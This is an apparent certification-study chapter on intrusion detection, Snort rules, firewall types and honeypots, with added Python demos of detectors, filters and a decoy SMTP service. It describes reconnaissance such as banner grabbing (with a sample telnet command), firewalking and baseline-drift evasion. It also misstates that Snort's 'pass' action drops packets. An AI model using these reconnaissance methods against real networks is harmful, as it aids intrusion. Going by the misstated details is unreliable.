Evading IDS Firewalls and Honeypots

In this chapter, we will learn about Intrusion Detection Systems, ways to detect an intrusion, and
various types of Intrusion Detection Systems. This chapter focuses on firewalls, types of
firewalls, honeypots, and types of honeypots. This chapter covers firewall evading tools and
firewall and IDS penetration testing.
16.1 Understand Intrusion Detection Systems (IDS)
Exam Focus: Understand Intrusion Detection Systems (IDS). Objective includes:
- Understand Intrusion Detection Systems (IDS).
- Learn ways to detect an intrusion.
- Acquire knowledge on various types of Intrusion Detection Systems.
Intrusion Detection System
An Intrusion Detection System (IDS) is used to detect unauthorized attempts at accessing and
manipulating computer systems locally, through the Internet or through an intranet. It can detect
several types of attacks and malicious behaviors that can compromise the security of a network
and its computers. This includes network attacks against vulnerable services, unauthorized logins
and access to sensitive data, and malware (e.g. viruses, worms, etc.). An IDS also detects attacks
that originate from within a system. In most cases, an IDS has three main components: Sensors,
Console, and Engine. Sensors generate security events. A console is used to alert and control
sensors and to monitor events. An engine is used to record events and to generate security alerts
based on received security events. In many IDS implementations, these three components are
combined into a single device.
The working of an IDS is shown in a figure that is not reproduced in this text.
Types of IDS
The following are the types of IDS:
- Network-based IDS: A Network-based Intrusion Detection System (NIDS) analyzes data packets flowing through a network. It can detect malicious packets that are designed to be overlooked by a firewall's simplistic filtering rules. It is responsible for detecting anomalous or inappropriate data that may be considered 'unauthorized' on a network. An NIDS captures and inspects all data traffic, regardless of whether it is permitted for checking or not.
- Host-based IDS: A host-based IDS (HIDS) is an Intrusion Detection System that runs on the system to be monitored. A HIDS monitors only the data that is directed to or originating from the particular system on which it is installed. Besides network traffic for detecting attacks, it can also monitor other parameters of the system such as running processes, file system access and integrity, and user logins for identifying malicious activities. BlackICE Defender and Tripwire are good examples of HIDS. Tripwire is an HIDS tool that automatically calculates the cryptographic hashes of all system files as well as any other files that a network administrator wants to monitor for modifications. It then periodically scans all monitored files and recalculates the information to see whether the files have been modified or not. It raises an alarm if changes are detected.
- Log file monitoring: It is generally a program that parses log files after the occurrence of an event such as failed login attempts.
- File integrity checking: It checks for Trojan horses, or files that have otherwise been modified, indicating that an intruder has already been there.
Types of IDS responses
The following are the different types of responses generated by an IDS:
1. True Positive: A valid anomaly is detected, and an alarm is generated.
2. True Negative: No anomaly is present, and no alarm is generated.
3. False Positive: No anomaly is present, but an alarm is generated. This is the worst-case scenario: if an IDS generates false positives at a high rate, its alerts are ignored and the IDS falls out of use.
4. False Negative: A valid anomaly is present, and no alarm is generated.
IDS detection methods
The following are IDS detection methods:
- Statistical Anomaly Detection: The Statistical Anomaly Detection method, also known as behavior-based detection, compares the current system operating characteristics against many baseline factors such as CPU utilization, file access activity, disk usage, etc. In this method, the Intrusion Detection System lets a Network Administrator either build profiles of authorized activities or place the IDS in learning mode so that it learns what is to be treated as normal activity. A large amount of time needs to be dedicated to ascertaining whether the IDS is producing few false negatives or not. The main drawback of this method is that if an attacker slowly changes his activities over time, the IDS might be fooled into accepting the new behavior as normal.
- Pattern Matching Detection: The Pattern Matching IDS, also known as a knowledge-based or signature-based IDS, is mainly based on a database of known attacks. These known attacks are loaded into the IDS as signatures, after which the IDS begins to guard the network. These signatures are usually given a number or name so that the network administrator can easily identify the attack that is occurring. Alerts from this IDS can be triggered for fragmented IP packets, streams of SYN packets (DoS), or any malformed Internet Control Message Protocol (ICMP) packets. The main disadvantage of the Pattern Matching System is that such an IDS can only trigger on signatures that are stored in its database; hence, any new or obfuscated attack performed by an attacker will go undetected.
- Protocol Detection Method: In the Protocol Detection Method, an IDS keeps state information and can detect abnormal activities of protocols such as IP, TCP, and UDP. If there is any violation of a protocol rule in incoming traffic, the IDS sends an alert message to the Network Administrator. Such an IDS is usually installed on the Web server and monitors the communication between a user and the system on which it is installed.
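The slow-drift weakness of behavior-based detection is easiest to see with numbers. The following is an added example, not code from the page or from any IDS product: it learns a baseline of a single metric (a constructed series of failed logins per hour), scores later samples by how many standard deviations they lie from the learned mean (the z-score threshold is this example's choice of scoring rule, not the page's), and compares a frozen baseline with an adaptive one that keeps absorbing every sample it does not alert on. A sudden burst trips both; a ramp that grows by one login per hour every three hours never trips the adaptive detector, because each accepted step drags the baseline along.

```python
import statistics


class AnomalyDetector:
    """Scores a metric sample by its distance from a learned baseline.

    threshold_sigma: how many standard deviations count as anomalous.
    adaptive: if True, every sample that is *not* alerted on is absorbed into
              the baseline (the IDS keeps "learning" what normal looks like).
    """

    def __init__(self, threshold_sigma=3.0, adaptive=False):
        self.threshold = threshold_sigma
        self.adaptive = adaptive
        self.samples = []

    def learn(self, values):
        """Learning mode: record samples the administrator vouches for as normal."""
        self.samples.extend(values)

    def zscore(self, x):
        mean = statistics.fmean(self.samples)
        sd = statistics.pstdev(self.samples) or 1e-9  # avoid division by zero
        return (x - mean) / sd

    def observe(self, x):
        """Return True if x is anomalous. In adaptive mode an accepted sample
        becomes part of the baseline, which is exactly what slow drift exploits."""
        alert = abs(self.zscore(x)) > self.threshold
        if self.adaptive and not alert:
            self.samples.append(x)
        return alert


# Constructed baseline: failed logins per hour on a quiet host (20 normal hours).
BASELINE = [2, 3, 1, 4, 2, 3, 2, 3, 1, 2, 4, 3, 2, 2, 3, 1, 2, 3, 2, 3]
# Constructed attacks: one sudden burst, and one that ramps up gently over a day.
SUDDEN_BURST = [40]
SLOW_RAMP = [v for v in range(3, 11) for _ in range(3)]  # 3,3,3,4,4,4,...,10,10,10


def run(detector, samples):
    """Feed samples to a freshly trained detector; return the number of alerts."""
    detector.learn(BASELINE)
    return sum(detector.observe(x) for x in samples)


def compare():
    """Alert counts for frozen vs adaptive baselines on both attack shapes."""
    return {
        "burst_frozen": run(AnomalyDetector(), SUDDEN_BURST),
        "burst_adaptive": run(AnomalyDetector(adaptive=True), SUDDEN_BURST),
        "ramp_frozen": run(AnomalyDetector(), SLOW_RAMP),
        "ramp_adaptive": run(AnomalyDetector(adaptive=True), SLOW_RAMP),
    }


if __name__ == "__main__":
    for name, alerts in compare().items():
        print(f"{name}: {alerts} alerts")
```

The frozen detector alerts on every ramp sample of five or more failed logins; the adaptive one accepts all twenty-four, ending with a "normal" of ten per hour. The practical mitigation is to re-baseline only from data a person has reviewed, not from whatever the detector happened to accept.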
Ways to detect an intrusion
The following ways are used to detect an intrusion:
- Signature recognition: It is also referred to as misuse detection. It tries to recognize events that misuse a system.
- Anomaly detection: It detects an intrusion based on the fixed behavioral characteristics of the users and components in a computer system.
- Protocol anomaly detection: It involves building models of TCP/IP protocols using their specifications.
Indications of intrusions
The following are indications of file system intrusions:
- Presence of new, unfamiliar files or programs
- Changes in file permissions
- Unexplained changes in the size of a file
- Rogue files on the system that do not correspond to the master list of signed files
- Unfamiliar file names in directories
- Missing files
The following are indications of network intrusions:
- Repeated probes of the available services on the machines
- Connections from unusual locations
- Repeated login attempts from remote hosts
- Arbitrary data in log files, indicating an attempt to cause either a Denial of Service or a service crash
The following are indications of system intrusions:
- Modifications to system software and configuration files
- Gaps in the system accounting
- Unusually slow system performance
- Crashing or rebooting of the system
- Short or incomplete logs
- Missing logs or logs with incorrect permissions or ownership
- Unfamiliar processes
- Unusual graphic displays or text messages
Snort
Snort is an open source network intrusion prevention and detection system that operates as a network sniffer. It logs network activity that matches predefined signatures. Signatures can be designed for a wide range of traffic, including Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and Internet Control Message Protocol (ICMP).
The three main modes in which Snort can be configured are as follows:
- Sniffer mode: It reads the packets of the network and displays them in a continuous stream on the console.
- Packet logger mode: It logs the packets to the disk.
- Network intrusion detection mode: It is the most complex and configurable configuration, allowing Snort to analyze network traffic for matches against a user-defined rule set.
Working of snort
The working of Snort is shown in a figure that is not reproduced in this text.
The Decoder performs the following functions:
- It saves the captured packets into the heap.
- It identifies link level protocols.
- It decodes IP.
The Detection Engine matches packets against the rules loaded into memory at Snort initialization. Output Plug-ins format the notifications for a user so that the user can access them in different ways.
Snort rules
Snort's rule engine enables a user to write rules in order to meet the requirements of the network. Snort rules are useful in differentiating between normal Internet activities and malicious activities. A Snort rule must be written on a single line; rules spanning multiple lines are not handled by the Snort rule parser. Rule header and rule options are the two logical parts of a Snort rule. The rule header identifies the rule's action, such as alert, log, pass, activate, or dynamic. The rule options identify the rule's alert message.
Rule action: The rule header stores the complete information of a packet and finds the action that is to be carried out and what rule to be applied. When the rule action finds a packet that matches the rule criteria, it alerts Snort. The following actions are available in Snort:
1. Alert: The selected alert method is used to generate an alert.
2. Log: The packet is logged.
3. Pass: The packet is dropped.
IP protocols: TCP, UDP, and ICMP are the IP protocols that Snort supports when analyzing for suspicious behavior.
Direction operator: It indicates the direction of the traffic. The traffic can flow either in one direction or bi-directionally. The following is an example of a Snort rule using the bidirectional operator:
log tcp !192.168.1.0/24 any <> 192.168.1.0/24 23
IP addresses: The "any" keyword is used to identify any IP address. Snort accepts only straight numeric IP addresses. A CIDR block gives the netmask that is applied to the rule's address and to the incoming packets that are checked against the rule.
Port numbers: Port numbers can be listed in various ways, including "any" ports, static port definitions, ranges, and by negation. The range operator ":" is used to indicate port ranges. The following is an example of port negation:
log tcp any any -> 192.168.1.0/24 !6000:6010
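To see how the header fields above combine, here is an added example (not Snort's own code) that parses the header part of a rule and evaluates it against simple packet tuples. It supports what the text describes: the "any" keyword, CIDR blocks, "!" negation on addresses and ports, ":" port ranges, and the "->" and "<>" direction operators. Snort variables such as $HOME_NET and the options in parentheses are outside its scope. The two rules it is run against are the ones quoted above; the packets are constructed.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int


def _match_addr(spec: str, ip: str) -> bool:
    """'any', a CIDR block, or either of those negated with '!'."""
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    hit = spec == "any" or ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)
    return hit != negate


def _match_port(spec: str, port: int) -> bool:
    """'any', a single port, a 'lo:hi' range (either end open), or a negation."""
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    if spec == "any":
        hit = True
    elif ":" in spec:
        lo, hi = spec.split(":", 1)
        hit = (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    else:
        hit = port == int(spec)
    return hit != negate


@dataclass
class RuleHeader:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str

    @classmethod
    def parse(cls, rule: str) -> "RuleHeader":
        header = rule.split("(", 1)[0]  # rule options, if present, are ignored
        fields = header.split()
        if len(fields) != 7 or fields[4] not in ("->", "<>"):
            raise ValueError(f"malformed rule header: {rule!r}")
        return cls(*fields)

    def _one_way(self, pkt, a_addr, a_port, b_addr, b_port) -> bool:
        return (_match_addr(a_addr, pkt.src) and _match_port(a_port, pkt.sport)
                and _match_addr(b_addr, pkt.dst) and _match_port(b_port, pkt.dport))

    def matches(self, pkt: Packet) -> bool:
        if self.proto != "ip" and self.proto != pkt.proto:
            return False
        forward = self._one_way(pkt, self.src, self.sport, self.dst, self.dport)
        if self.direction == "->":
            return forward
        # "<>" matches the same endpoints in either direction
        return forward or self._one_way(pkt, self.dst, self.dport, self.src, self.sport)


RULES = [  # the two rules quoted in the text
    "log tcp !192.168.1.0/24 any <> 192.168.1.0/24 23",
    "log tcp any any -> 192.168.1.0/24 !6000:6010",
]


def matching_rules(rules, pkt):
    """Return the rules (as written) whose header matches the packet."""
    return [r for r in rules if RuleHeader.parse(r).matches(pkt)]


if __name__ == "__main__":
    # Constructed packets: telnet from outside, the reply, and an X11-range port
    for p in (Packet("tcp", "10.0.0.5", 40000, "192.168.1.10", 23),
              Packet("tcp", "192.168.1.10", 23, "10.0.0.5", 40000),
              Packet("tcp", "10.0.0.5", 40000, "192.168.1.10", 6005)):
        print(p, "->", matching_rules(RULES, p))
```

Note how the bidirectional rule matches the telnet reply leaving the subnet (source port 23) while the "->" rule does not, and how "!6000:6010" silently passes port 6005 traffic: a negated port range logs everything except the range, which is easy to misread as the opposite.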
Tipping Point
Tipping Point IPS is an inline device. It is placed seamlessly and transparently into the network. Each packet is thoroughly inspected in order to determine whether it is malicious or legitimate. It delivers performance, application, and infrastructure protection at gigabit speeds via total packet inspection.
Intrusion detection tools
The following are intrusion detection tools:
- Security Network Intrusion Prevention System
- Strata Guard
- Peek & Spy
- CRCMd5 Data Validation
- Cisco IDS 4250 Appliance
- DiskSearch 32
- INTOUCH INSA-Network Security Agent
- IDP8200
- OSSEC
- AIDE (Advanced Intrusion Detection Environment)
- Netifera
- Tripwire
- eXpert-BSM
- SNARE (System iNtrusion Analysis & Reporting Environment)
- Cisco Intrusion Detection
- Vanguard Enforcer
Tripwire
Tripwire is a System Integrity Verifier (SIV) that is used to monitor files and detect changes
made by an intruder. The tripwire utility can be used to check the file size, the file signature, and
the integrity of a file. Tripwire is a tool that automatically calculates the cryptographic hashes of
all system files as well as any other file that a network administrator wants to monitor for
modifications. It then periodically scans all monitored files and recalculates the information to
see whether the files have been modified or not. It raises an alarm if changes are detected.
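The hash-and-rescan loop that Tripwire and the HIDS description above rely on is short enough to show end to end. The following is an added example, not Tripwire's code: it snapshots a directory tree (SHA-256, size and permission bits per regular file), rescans later, and groups the differences under the file-system intrusion indicators listed earlier (new, missing, changed content, changed size, changed permissions). The tree and the tampering are constructed inside a temporary directory; a real deployment would store the baseline off-host, since a baseline an intruder can rewrite proves nothing.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def file_record(path: Path) -> dict:
    """Hash a file and record the attributes an integrity checker watches."""
    st = path.stat()
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode)}  # permission bits only


def snapshot(root: Path) -> dict:
    """Walk the tree and build {relative path: record} for regular files."""
    records = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            p = Path(dirpath) / name
            if p.is_file() and not p.is_symlink():
                records[p.relative_to(root).as_posix()] = file_record(p)
    return records


def compare(baseline: dict, current: dict) -> dict:
    """Group differences between two snapshots by the indicator they show."""
    report = {"added": [], "missing": [], "content": [], "size": [], "mode": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["missing"].append(rel)
        else:
            old, new = baseline[rel], current[rel]
            if old["sha256"] != new["sha256"]:
                report["content"].append(rel)
            if old["size"] != new["size"]:
                report["size"].append(rel)
            if old["mode"] != new["mode"]:
                report["mode"].append(rel)
    return report


def demo() -> dict:
    """Constructed scenario: baseline a small tree, tamper with it, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "etc").mkdir()
        (root / "bin" / "ls").write_bytes(b"original ls binary")
        (root / "etc" / "passwd").write_text("root:x:0:0::/root:/bin/sh\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        for rel in ("bin/ls", "etc/passwd", "etc/hosts"):
            (root / rel).chmod(0o644)
        baseline = snapshot(root)

        # Simulated tampering, one file per indicator named in the text
        (root / "bin" / "ls").write_bytes(b"original ls binary + backdoor")  # content, size
        (root / "etc" / "passwd").chmod(0o666)                               # permissions
        (root / "etc" / "hosts").unlink()                                    # missing file
        (root / "etc" / "shadow.bak").write_text("copied secrets\n")          # new file
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for indicator, files in demo().items():
        print(f"{indicator:8s} {files}")
```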
BlackICE Defender
BlackICE Defender is a Host-Based Intrusion Detection System (HIDS). It provides a firewall
that detects, reports, and blocks all suspected access attempts. It provides a notification by
flashing tray icons when any intrusion is detected. It also provides detailed information regarding
the different types of attacks that can harm the security of the network.
IPS
Intrusion Prevention System (IPS) is a tool that is used to prevent sophisticated attacks on the
network. The IPS tool detects such attacks by keeping an eye on the trends, looking for attacks
that use particular patterns of messages, and other factors. The IPS tools sit in the packet's
forwarding path and then rate and report each potential threat by analyzing the traffic. The IPS
tool has the ability to react and filter the traffic. There are two types of IPS:
- Host intrusion prevention system (HIPS)
- Network intrusion prevention system (NIPS)
Anti-x
Anti-x is a component of the Cisco Adaptive Security Appliance (ASA). Anti-x provides an in-depth security design that prevents various types of problems such as viruses. The security provided by the tool includes the following:
- Anti-virus: It scans network traffic and prevents the transmission of known viruses. It detects viruses through their virus signatures.
- Anti-spyware: It scans network traffic and prevents the transmission of spyware programs. As spyware does a lot of damage, this tool becomes very critical for any organization. Spyware eats a lot of precious bandwidth too.
- Anti-spam: It deletes and segregates all junk e-mails before forwarding them to users. It examines all e-mails that arrive in the network.
- Anti-phishing: It prevents phishing attacks from reaching network users.
- URL filtering: It filters Web traffic based on URL to prevent users from connecting to inappropriate sites.
- E-mail filtering: Apart from providing the anti-spamming feature, it also filters e-mails containing offensive material, potentially protecting an organization from lawsuits.
A Cisco ASA appliance can be configured in a network-based role for all Anti-x functions.
16.2 Understand what is a firewall, types of firewalls, and identify firewall identification
techniques
Exam Focus: Understand what is a firewall, types of firewalls, and identify firewall identification techniques. Objective includes:
- Understand what is a firewall.
- Types of firewalls.
- Identify firewall identification techniques.
Firewall
A firewall is a combination of software and hardware that prevents data packets from coming in
or going out of a specified network or computer. It is used to separate an internal network from
the Internet. It analyzes all the traffic between a network and the Internet, and provides
centralized access control on how users should use the network. A firewall can also perform the
following functions:
- Block unwanted traffic.
- Direct the incoming traffic to more trustworthy internal computers.
- Hide vulnerable computers that are exposed to the Internet.
- Log traffic to and from the private network.
- Hide information, such as computer names, network topology, network device types, and internal user IDs from external users.
The firewall is placed at the junction point or gateway between the two networks. It may be
concerned with the type of traffic or with the source or destination addresses and ports.
The firewall architecture includes bastion host, screened subnet, and multi-homed firewall.
Bastion host
A bastion host is a computer that must be made secure because it is accessible from the Internet,
and hence is more vulnerable to attacks. A bastion host is placed at the protected network's point
of penetration, often in front of the screening router. It provides security to an internal network
against unauthorized access and misuse.
Screened subnet
A screened subnet is a firewall architecture that offers additional advantages over the bastion
host architecture. This architecture uses a single firewall with three network cards (commonly
referred to as a triple homed firewall). An example of this topology is shown in the figure below:
The screened subnet provides a solution that allows organizations to offer services securely to
Internet users. Any servers that host public services are placed in the Demilitarized Zone (DMZ),
which is separated from both the Internet and the trusted network by a firewall. Therefore, if a
malicious user does manage to compromise the firewall, he does not have access to the Intranet
(providing that the firewall is properly configured).
Multi-homed firewall
In a multi-homed firewall, more than three interfaces are available, which permit further subdivision of systems on the basis of the specific security objectives of an organization.
Demilitarized zone
A demilitarized zone (DMZ) is a physical or logical subnetwork that contains and exposes
external services of an organization to a larger network, usually the Internet. The purpose of a
DMZ is to add an additional layer of security to an organization's Local Area Network (LAN);
an external attacker only has access to equipment in the DMZ, rather than the whole of the
network. Hosts in the DMZ have limited connectivity to specific hosts in the internal network,
though communication with other hosts in the DMZ and to the external network is allowed. This
allows hosts in the DMZ to provide services to both the internal and external networks, while an
intervening firewall controls the traffic between the DMZ servers and the internal network
clients. In a DMZ configuration, most computers on the LAN run behind a firewall connected to
a public network such as the Internet.
Types of firewalls
The following are the types of firewalls:
- Packet filtering firewall: Packet filtering firewalls work on the first three layers of the OSI reference model, which means that all the work is done between the network and physical layers. When a packet originates from the sender and filters through a firewall, the device checks for matches to any of the packet filtering rules that are configured in the firewall and drops or rejects the packet accordingly. In a software firewall, packet filtering is done by a program called a packet filter. The packet filter examines the header of each packet based on a specific set of rules, and on that basis, decides to prevent it from passing (called DROP) or allow it to pass (called ACCEPT). A packet filter passes or blocks packets at a network interface based on source and destination addresses, ports, or protocols. The process is used in conjunction with packet mangling and Network Address Translation (NAT). Packet filtering is often part of a firewall program for protecting a local network from unwanted intrusion. This type of firewall can be best used for network perimeter security.
- Circuit-level gateway firewall: Circuit-level gateways work at the session layer of the OSI model or the TCP layer of the TCP/IP model. They determine whether a requested session is legitimate or not by monitoring TCP handshaking between packets. Information passed to a remote computer via a circuit-level gateway appears to have originated from the gateway. Circuit-level gateways hide information regarding the private network that they protect. They do not filter individual packets.
- Application-level firewall: Application-level gateways can filter packets at the application layer of the OSI model. Services for which there is no proxy cannot be accessed by incoming or outgoing packets. Any FTP, gopher, telnet, or other traffic will not be allowed by an application-level gateway that is configured as a Web proxy. The application-level gateway can filter application-specific commands, such as HTTP POST and GET, as it examines packets at the application layer.
- Stateful multilayer inspection firewall: The stateful multilayer inspection firewall combines the aspects of the other three types of firewalls. It filters packets at the network layer, determines whether session packets are legitimate, and evaluates the contents of packets at the application layer.
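The difference between judging each packet on its own header and following the TCP handshake (the circuit-level and stateful types above) is best shown side by side. The following is an added example, not any firewall product's code: a stateless filter that admits inbound packets whenever the ACK bit is set (the classic way such a filter lets replies through), and a stateful filter that records each connection an inside host opens and admits inbound packets only for a session in its table. The internal network, the addresses and the packet trace are all constructed.

```python
import ipaddress
from dataclasses import dataclass

INSIDE = ipaddress.ip_network("192.168.1.0/24")  # constructed internal network


@dataclass(frozen=True)
class Pkt:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # TCP flags as letters: "S" SYN, "SA" SYN/ACK, "A" ACK


def _inbound(pkt) -> bool:
    return (ipaddress.ip_address(pkt.dst) in INSIDE
            and ipaddress.ip_address(pkt.src) not in INSIDE)


def stateless_filter(pkt) -> str:
    """Decide from this packet's header alone.

    Outbound traffic passes. Inbound traffic passes when ACK is set, which is
    how a stateless filter tries to admit replies to inside connections; it
    cannot distinguish a genuine reply from a forged one.
    """
    if not _inbound(pkt):
        return "ACCEPT"
    return "ACCEPT" if "A" in pkt.flags else "DROP"


class StatefulFilter:
    """Circuit-level inspection: follow the three-way handshake and admit
    inbound packets only for sessions that an inside host opened."""

    def __init__(self):
        self.sessions = {}  # (inside ip, port, outside ip, port) -> state

    def filter(self, pkt) -> str:
        if _inbound(pkt):
            key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
            state = self.sessions.get(key)
            if state == "SYN_SENT" and pkt.flags == "SA":
                self.sessions[key] = "SYN_RECV"
                return "ACCEPT"
            if state == "ESTABLISHED":
                return "ACCEPT"
            return "DROP"  # no matching session: unsolicited, whatever the flags
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        state = self.sessions.get(key)
        if pkt.flags == "S" and state is None:
            self.sessions[key] = "SYN_SENT"
            return "ACCEPT"
        if state == "SYN_RECV" and "A" in pkt.flags:
            self.sessions[key] = "ESTABLISHED"
            return "ACCEPT"
        if state == "ESTABLISHED":
            return "ACCEPT"
        return "DROP"


# Constructed trace: a legitimate inside-to-outside web session, then two
# unsolicited inbound packets from another host (a forged ACK and a plain SYN).
TRACE = [
    Pkt("192.168.1.10", 40000, "203.0.113.5", 80, "S"),
    Pkt("203.0.113.5", 80, "192.168.1.10", 40000, "SA"),
    Pkt("192.168.1.10", 40000, "203.0.113.5", 80, "A"),
    Pkt("203.0.113.5", 80, "192.168.1.10", 40000, "A"),
    Pkt("198.51.100.9", 80, "192.168.1.10", 40000, "A"),
    Pkt("198.51.100.9", 4444, "192.168.1.10", 22, "S"),
]


def run_trace(trace=TRACE):
    """Return (stateless verdict, stateful verdict) for each packet in order."""
    stateful = StatefulFilter()
    return [(stateless_filter(p), stateful.filter(p)) for p in trace]


if __name__ == "__main__":
    for pkt, verdicts in zip(TRACE, run_trace()):
        print(f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} [{pkt.flags}] {verdicts}")
```

Both filters agree on the real session and on the bare inbound SYN; they part company on the fifth packet, a forged ACK aimed at an open client port, which the stateless filter admits and the stateful one drops for want of a session.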
Firewall identification techniques
The following are firewall identification techniques:
- Port scanning: An attacker uses port scanning to determine ports that are available. Port scanning involves sending a message to each port, one at a time. Whether the port is used or not can be indicated by the kind of response received, and the port can therefore be probed for weakness. Some firewalls can be uniquely identified by simple port scans.
- Banner grabbing: Banner grabbing is an enumeration technique used to glean information about computer systems on a network and the services running on their open ports. Administrators can use this to take inventory of the systems and services on their network. An intruder, however, can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25, respectively. Tools commonly used to perform banner grabbing are Telnet, which is included with most operating systems, and Netcat. Banner grabbing is a simple method of OS detection. It is useful in detecting services run by firewalls. FTP, telnet, and Web servers are three main services which send out banners. The following is an example of SMTP banner grabbing:
telnet mail.targetcompany.org 25
- Firewalking: Firewalking is a technique for gathering information about a remote network protected by a firewall. This technique can be used effectively to perform information gathering attacks. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall. If the firewall allows this crafted packet through, it forwards the packet to the next hop. On the next hop, the packet expires and elicits an ICMP "TTL expired in transit" message to the attacker. If the firewall does not allow the traffic, there should be no response, or an ICMP "administratively prohibited" message should be returned to the attacker. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall. The main drawback of this technique is that if an administrator blocks ICMP packets from leaving the network, it is ineffective.
Some important firewalls
The following are some important firewalls:
- Check Point Firewall Software
- eScan Enterprise
- Jetico Personal Firewall
- ZoneAlarm Pro
- Novell BorderManager
- FireWall-1
- InstaGate
- AccessMaster NetWall
16.3 Understand honeypot
Exam Focus: Understand a honeypot. Objective includes:
- Understand a honeypot.
- Assess various types of honeypots.
- Understand how to set up a honeypot.
Honeypot
A honeypot is a computer that is used to attract potential intruders or attackers. It is for this
reason that a honeypot has low security permissions. A honeypot is used to gain information
about the intruders and their attack strategies.
Types of honeypots
The following are the types of honeypots:
- Low-interaction honeypot: It emulates services and programs that would be found on an individual's system. The honeypot will simply generate an error if the attacker does something that the emulation does not expect. The low-interaction honeypot captures a limited amount of information.
- High-interaction honeypot: It offers a vast amount of information about attackers. It provides an attacker access to the real operating system without any restriction. A high-interaction honeypot is a powerful weapon that provides opportunities to discover new tools, to identify new vulnerabilities in the operating system, and to learn how blackhats communicate with one another.
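What "emulates a service and errors on anything unexpected" looks like in code, as an added example that is not taken from any honeypot product: a decoy SMTP dialogue that answers the handful of verbs a probe expects, logs every line the client sends with a timestamp and peer address, and returns a generic error for anything outside its small vocabulary. The socket listener is left out so the logic runs offline; serve_lines is what a listener would call once per connection. The decoy hostname, the probe and the peer address (from the 203.0.113.0/24 documentation range) are constructed.

```python
import time
from dataclasses import dataclass, field


@dataclass
class Session:
    peer: str
    log: list = field(default_factory=list)  # (timestamp, peer, client line)
    done: bool = False


class FakeSMTP:
    """Emulates just enough SMTP to keep a probe talking."""

    HOSTNAME = "mail.example.test"  # constructed decoy hostname
    BANNER = f"220 {HOSTNAME} ESMTP ready"

    def __init__(self, clock=time.time):
        self.clock = clock  # injectable so logs are reproducible in tests

    def handle(self, session: Session, line: str) -> str:
        session.log.append((self.clock(), session.peer, line))
        verb = line.split(" ", 1)[0].upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {self.HOSTNAME}"
        if verb in ("MAIL", "RCPT"):
            return "250 OK"
        if verb == "DATA":
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            session.done = True
            return "221 Bye"
        # Anything outside the emulated set (VRFY, EXPN, AUTH, pasted shell
        # commands, ...) gets a generic error: the "unexpected input" case.
        return "502 5.5.2 Command not implemented"


def serve_lines(honeypot: FakeSMTP, peer: str, lines):
    """Drive one connection from a list of client lines (what a socket
    listener would feed in). Returns (responses sent, session log)."""
    session = Session(peer)
    responses = [honeypot.BANNER]
    for line in lines:
        responses.append(honeypot.handle(session, line))
        if session.done:
            break
    return responses, session.log


# Constructed probe: a scanner that enumerates users, then disconnects.
PROBE = ["EHLO scanner", "VRFY root", "MAIL FROM:<a@example.test>", "QUIT", "EHLO again"]


def demo():
    """Run the probe against the decoy with a fixed clock."""
    return serve_lines(FakeSMTP(clock=lambda: 0.0), "203.0.113.7", PROBE)


if __name__ == "__main__":
    responses, log = demo()
    for sent, reply in zip(["<connect>"] + PROBE, responses):
        print(f"C: {sent:28s} S: {reply}")
    print(f"{len(log)} client lines logged from {log[0][1]}")
```

Because nothing legitimate ever connects to the decoy, every logged line is attack data (the "small set of data, nearly all of it real attacks" advantage), while the 502 answers mark exactly where the emulation ran out, which is also where a fingerprinting tool would notice it is not a real mail server.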
Advantages and disadvantages of honeypots
Honeypots have several advantages, which are as follows:
- Small set of data: Honeypots collect small amounts of data, but almost all of this data is about real attacks or unauthorized activity.
- Reduced false positives: Honeypots almost always detect or capture only attacks or unauthorized activities, which reduces false positives.
- False negatives: Honeypots detect and record any unseen or unnoticed attacks or behavior.
- Cost effective: Honeypots only interact with malicious activity, so there is no need for high-performance resources.
Honeypots also have some disadvantages, which are as follows:
- Limited view: Honeypots can only see activities that interact with them. They cannot see or capture any attacks directed against existing systems.
- Discovery and fingerprinting: Honeypots can be easily detected and fingerprinted by several tools.
- Risk of takeover: Since there are many security holes in honeypots, a malicious attacker can take over the honeypot and use it to gain access to and attack other networks.
Set up a honeypot
Take the following steps to set up a honeypot:
1. Download or purchase honeypot software. The following are some of the programs
available for Linux systems:
o Tiny Honeypot
o LaBrea
o Honeyd
KFSensor is software that operates with Windows.
2. Install a honeypot onto the computer by logging in as an administrator on the computer.
3. Install the software on the computer. Select the "Full Version" to ensure that every
feature of the program is installed.
4. Place the honeypot software in the "Program Files" folder. Once you have chosen the
folder, click "OK". The program will install.
5. Restart the computer for the honeypot to work.
6. Check the items that you want the honeypot to look for, including services, applications
and Trojans, and name your domain by configuring the honeypot.
Honeypot tools
The following are honeypot tools:
- NetBait
- Single-honeypot
- LaBrea Tarpit
- Kojoney
- Sendmail SPAM Trap
- HoneyBOT
- PatriotBox
- Google Hack Honeypot
KFSensor is a Windows-based honeypot Intrusion Detection System (IDS). It acts as a honeypot
